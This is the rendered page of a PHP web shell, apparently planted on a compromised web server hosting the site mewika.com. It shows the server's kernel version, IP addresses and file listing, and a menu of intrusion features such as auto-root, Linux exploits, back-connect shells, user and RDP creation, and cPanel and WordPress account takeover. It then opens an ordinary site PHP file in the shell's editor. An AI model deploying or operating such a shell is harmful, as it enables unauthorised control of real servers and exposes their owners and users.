Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.222.21.222
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
mewika.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets-new
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
1Head.php
6.88
KB
-rw-r--r--
2HeadMenu.php
11.58
KB
-rw-r--r--
3Footer.php
6.72
KB
-rw-r--r--
4End.php
581
B
-rw-r--r--
BannerCoverAll.php
1.83
KB
-rw-r--r--
aboutus.php
2.18
KB
-rw-r--r--
contact-us.php
2.49
KB
-rw-r--r--
content.php
4.77
KB
-rw-r--r--
detail.php
699
B
-rw-r--r--
detail_RecommendedProjects.php
5.09
KB
-rw-r--r--
detail_about.php
1.8
KB
-rw-r--r--
detail_banner.php
3.66
KB
-rw-r--r--
detail_consult.php
2.43
KB
-rw-r--r--
detail_news.php
5.29
KB
-rw-r--r--
detail_ourteam.php
2.96
KB
-rw-r--r--
detail_product.php
9.33
KB
-rw-r--r--
index.php
156
B
-rwxr-xr-x
news.php
3.68
KB
-rw-r--r--
our-services.php
3.84
KB
-rw-r--r--
package.json
14.21
KB
-rw-r--r--
product-detail.php
7.41
KB
-rw-r--r--
project-detail.php
17.72
KB
-rw-r--r--
project.php
3.68
KB
-rw-r--r--
properties.php
17.79
KB
-rw-r--r--
properties_detail.php
2.16
KB
-rw-r--r--
search.php
9.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : detail_consult.php
<?PHP $CategoryContent_ID = 56; $CategoryContentLanguage_ID = 113; include 'Structure/Structure_Content_Loop.php'; while ($objResult_content = mysqli_fetch_array($objQuery_content)) { $ContentID = $objResult_content["Content_ID"]; $ContentName = $objResult_content["Content_Name"]; $ContentContent1 = $objResult_content["Content_Content1"]; $ContentContent2 = $objResult_content["Content_Content2"]; $ContentContent3 = $objResult_content["Content_Content3"]; $ContentContent4 = $objResult_content["Content_Content4"]; $ContentContent5 = $objResult_content["Content_Content5"]; $ContentNumber = $objResult_content["Content_Number"]; $ContentDate = $objResult_content["Content_Date"]; $ContentTime = $objResult_content["Content_Time"]; include 'Structure/Structure_Content_check.php'; ?> <div id='calluswrap' class='qx-section'> <div class="qx-container"> <div class="qx-rows"> <div id='qx-row-64643' class='qx-row-wrap'> <div class='qx-row qx-row-align-center'> <div id="qx-column-244644" class="qx-column"> <div class="qx-col-wrap"> <div class="qx-elements-wrap"> <div class="qx-element-wrap"> <div id="qx-heading-804645" class="qx-element qx-element-heading-v2" qx-scrollspy="cls:qx-animation-slide-left-medium;repeat:ture;"> <h3> <span> <?= $Check_ContentContent1; ?> </span> </h3> </div> </div> <div class="qx-element-wrap"> <div id="qx-text-954646" class="qx-element qx-element-text-v2" qx-scrollspy="cls:qx-animation-slide-left-medium;repeat:ture;delay:1"> <?= $Check_ContentContent3; ?> <?= $Check_ContentContent4; ?> </div> </div> </div> </div> </div> <div id="qx-column-74647" class="qx-column"> <div class="qx-col-wrap"> <div class="qx-elements-wrap"> <div class="qx-element-wrap"> <div id="qx-button-694648" class="qx-element qx-element-button-v2" qx-scrollspy="cls:qx-animation-slide-right-medium;repeat:ture;delay:2"> <a class='qx-btn qx-btn-primary' href=tel:<?= $Check_ContentContent5; ?>> <div class="qx-element-button-wrapper qx-justify-content-center"> <i class="qxio-ios-telephone"></i> <span><?= $Check_ContentContent2; ?></span> </div> </a> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <?PHP } ?>
Close